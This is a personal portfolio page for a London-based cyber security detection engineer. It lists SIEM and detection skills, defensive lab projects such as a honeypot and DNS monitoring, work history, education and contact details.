Open to opportunities · London, UK

Amanpreet Singh Matharu

Cyber Security Infrastructure & Detection Engineer

SOC operations, detection engineering, incident response, and secure infrastructure design. Building controls that work reliably in real operational environments — from log ingestion to MITRE ATT&CK-aligned detections.

📧 Get In Touch ⌥ GitHub in LinkedIn
5+
Years in Tech
20+
KQL Detections
4
SOC Projects
MITRE
ATT&CK Aligned
3
Languages
English — Full Professional Hindi — Professional Punjabi — Native

// 00 — profile

About Me

I am a Cyber Security Infrastructure and Detection Engineer with hands-on experience across SOC operations, detection engineering, incident response, and secure infrastructure design. My background combines strong infrastructure fundamentals with advanced defensive security, allowing me to build controls that work reliably in real operational environments.

I design and operate SIEM-based detections using Microsoft Sentinel (KQL) and Splunk (SPL), working closely with SOC teams to investigate incidents, tune alerts, reduce false positives, and improve detection quality — all aligned to MITRE ATT&CK, covering identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, and lateral movement.

From an infrastructure perspective I bring practical knowledge of TCP/IP, DNS, DHCP, VLANs, firewalls, VPNs, and traffic analysis using Wireshark. I have designed DNS security monitoring pipelines including DNSSEC-enabled recursive resolution, secure log forwarding, and SIEM-based detection of malicious domains.

My early career included NOC and data centre operations, network rack builds, device configuration, and enterprise server migration support — giving me the infrastructure depth that most detection engineers lack. I am seeking a role where I can contribute immediately to security operations while continuing to grow as a detection-focused security engineer.

🧠
Detection Engineering
Identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, lateral movement — all MITRE ATT&CK mapped
🏗️
Infrastructure Security
Active Directory, BitLocker via GPO, DNS security pipelines, DNSSEC, firewall & VPN design
🔬
Hands-On Lab Builder
Honeypots, IoT-to-SIEM pipelines, DNS monitoring platforms — built from scratch, not tutorials
🎓
Educator & Mentor
Advanced cybersecurity teaching at UWL — SIEM, incident response, CTF labs, AD attack simulations
🌐
Right to Work — UK
Skilled Worker Visa active. Open to on-site, hybrid, and remote roles across England

// 01 — expertise

Technical Skills

🛡️
SIEM & Detection
Microsoft SentinelSplunk EnterpriseKQL (Advanced)SPLLog Analytics
🎯
Threat Hunting & Detection Eng.
MITRE ATT&CKThreat HuntingSysmonIOC AnalysisFalse Positive Reduction
☁️
Endpoint & Cloud Security
Defender XDRAzure AD / Entra IDDefender for IdentityMFABitLocker via GPO
🌐
Networking & Infrastructure
TCP/IPWiresharkDNS / DHCPVLANsFirewallsVPNs (CCNA)DNSSEC
⚙️
Development & IoT
Python (Automation)BashJSON ParsingRaspberry PiIoT SensorsLinux
🏢
Identity & Active Directory
AD DesignGPO EnforcementNaming StandardsAccess ControlWindows Event Logs
🔧
Systems Administration
Atera RMMMicrosoft 365Exchange OnlineHuntress EDROdoo ERP
📋
SOC & Incident Response
BEC AnalysisRansomware DetectionIR PlaybooksAlert TriageNIST / SANS

// 02 — portfolio

Key Projects

🔍
Microsoft Sentinel Threat Hunting Portfolio
Sentinel · KQL · Sysmon · MITRE ATT&CK
  • Built a Threat Hunting Workbook with 20+ custom KQL queries detecting PowerShell abuse, C2 traffic & lateral movement.
  • Analysed BEC attack paths — detections for MFA fatigue, inbox rules & token replay.
  • Developed ransomware early-detection workflows focusing on behavioural patterns & file system anomalies.
  • Engineered credential theft detections for LSASS dumping & Kerberoasting (Event Logs 4624/4625).
KQLSentinelMITRE ATT&CKSysmonThreat Hunting
🤖
Cyber-Physical SOC: IoT to Splunk Pipeline
Splunk · SPL · Python · Raspberry Pi · DHT11 / PIR / MPU6050
  • Designed end-to-end telemetry pipeline: Sensors → Raspberry Pi → JSON logs → Splunk Universal Forwarder.
  • Integrated DHT11 (temp/humidity), PIR (motion), and MPU6050 (vibration/tamper) sensors.
  • Built SPL-based time-window correlation logic (Motion + Tamper within 120s) to reduce false positives.
  • Automated incident creation with severity scoring and SOC-style lifecycle tracking.
SplunkPythonRaspberry PiIoTSPL
🍯
Cowrie Honeypot & SIEM Detection Engineering
Splunk · Cowrie SSH · MITRE ATT&CK · IR Playbooks
  • Deployed Cowrie SSH honeypot on Raspberry Pi — capturing auth attempts, HASSH fingerprints, command execution & session lifecycle.
  • Forwarded structured JSON telemetry to Splunk via Universal Forwarder.
  • Built SOC detections for brute-force (T1110), credential compromise (T1078), and post-exploitation (T1059, T1105).
  • Created IR playbooks for high-severity events; honeypot kept off public internet per DMZ best practice.
SplunkHoneypotMITRE ATT&CKIR PlaybooksRaspberry Pi
🌐
DNS Security Monitoring Platform
Pi-hole · Unbound · DNSSEC · Splunk · Tailscale
  • Built a SOC-grade DNS telemetry platform treating DNS as a primary security signal.
  • Pi-hole for filtering + Unbound for full recursive DNSSEC resolution; all activity forwarded to Splunk.
  • Secured transport over a private Tailscale mesh network; host hardened with firewall rules & access controls.
  • Enables detection of DNS tunnelling, beaconing, and malicious domain patterns. MITRE ATT&CK extension planned.
SplunkDNSSECPi-holeTailscaleThreat Hunting

// 03 — career

Professional Experience

System AdministratorFeb 2026 – Present
Guard IQ Contract · Remote
  • Administer Microsoft 365 tenant services — Exchange Online, identity management, mailbox admin & security configurations.
  • Manage endpoint monitoring and remote management through Atera RMM including patch management & troubleshooting.
  • Support incident investigation and endpoint remediation based on Huntress EDR alerts and security telemetry.
  • Implement security best practices: MFA, access control, and system hardening across client environments.
  • Maintain Odoo ERP system and assist with alert triage & security investigations across managed environments.
Cyber Security LecturerJan 2023 – Present
University of West London Part-time · On-site
  • Delivered hands-on SIEM, incident response, and Active Directory attack labs aligned to real SOC workflows.
  • Guided students through malware behaviour labs, PowerShell investigations, identity attack simulations & SOC alert analysis.
  • Taught Windows Server, Active Directory, VLANs, routing, subnetting, VPNs, and cloud identity security.
  • Developed course materials covering threat hunting, MITRE ATT&CK, and security monitoring workflows.
Cyber Security Detection EngineeringJan 2021 – Present
Independent / Self-Directed Self-employed
  • Designed and implemented a cyber-physical SOC prototype with real-world sensor telemetry into Splunk SIEM.
  • Deployed and analysed Cowrie SSH honeypot — studying real adversary behaviour and authentication patterns.
  • Built DNS security monitoring platform with DNSSEC, Pi-hole, Unbound, and Splunk integration.
  • Focused on detection tuning, false-positive reduction, and operational SOC relevance throughout all projects.
Information Technology AnalystJun 2018 – Mar 2020
Nagarro Full-time · Hybrid · India
  • Supported enterprise Windows/Linux, Active Directory, and network environments with focus on security controls.
  • Managed AD users, permissions & GPOs; performed security patching, AV management, and encryption enforcement.
  • Configured DNS, DHCP, VPN, and firewall rules supporting secure network operations.
  • Used Wireshark to diagnose network anomalies; supported internal audits and compliance controls.

// 04 — academic

Education

MSc Cyber Security
University of West London
Feb 2021 – Jul 2022
Merit
Fundamentals of Cybersecurity · Network & Systems Security · Applied Cryptography · Security & Assurance (GRC) · Big Data Analytics · Knowledge Management
Computer Systems Networking & Telecoms
Jetking
Jun 2017 – Jan 2018
Distinction
CCNA · MSCA · Active Directory · Server 2008/2012/2016 · Routing & Switching · BGP · VLANs · Network Security
BSc Information Technology
Guru Nanak Dev University
2014 – 2017

"Amanpreet never allowed challenges to break his focus. He was the one who stayed consistent, encouraged others, shared notes, explained concepts patiently, and supported anyone who was falling behind. What I admire most is how he handles pressure — calmly, logically, and with a maturity far beyond his age. Amanpreet is not just hardworking; he is reliable, humble, and genuinely supportive. Anyone who works with him will see the same qualities: resilience, integrity, and a mindset that refuses to give up."

MK
Manpreet Kaur
Assistant Manager at Amorino UK · Studied together at UWL

// 05 — connect

Get In Touch

Let's work together.

Open to SOC Analyst, Detection Engineer, and Security Infrastructure roles across England — on-site, hybrid, or remote. Skilled Worker Visa active, no sponsorship needed.

📧
Email
singhamanpreet751@gmail.com
 📞
Phone
+44 7717 109292
 in
LinkedIn
in/amanpreets94
GitHub
Amanpreet-Ramgharia
🎖️ Certifications & Status
IN PROGRESSCompTIA CySA+
ACTIVESkilled Worker Visa — Right to Work (UK)
ACTIVEMSc Cyber Security — UWL (Merit)
ACTIVENetworking — Jetking (Distinction)
ACTIVEHuntress EDR — Operational Experience
ACTIVEAtera RMM — Operational Experience